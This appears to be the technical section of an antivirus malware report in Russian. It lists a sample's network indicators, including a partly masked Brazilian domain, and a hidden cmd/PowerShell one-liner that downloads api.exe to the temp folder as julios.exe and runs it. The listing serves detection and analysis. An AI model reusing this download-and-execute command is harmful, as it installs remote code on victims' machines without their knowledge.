Техническая информация
- https://www.co#####ercultura.com.br/adm/cliente/api.exe как %temp%\julios.exe
- 'co#####ercultura.com.br':443
- DNS ASK co#####ercultura.com.br
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('https://www.co#####ercultura.com.br/adm/cliente/api.exe','%temp%\julios.exe'); Start '%temp%\julios.exe'' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('https://www.co#####ercultura.com.br/adm/cliente/api.exe','%temp%\julios.exe'); Start '%temp%\julios.exe'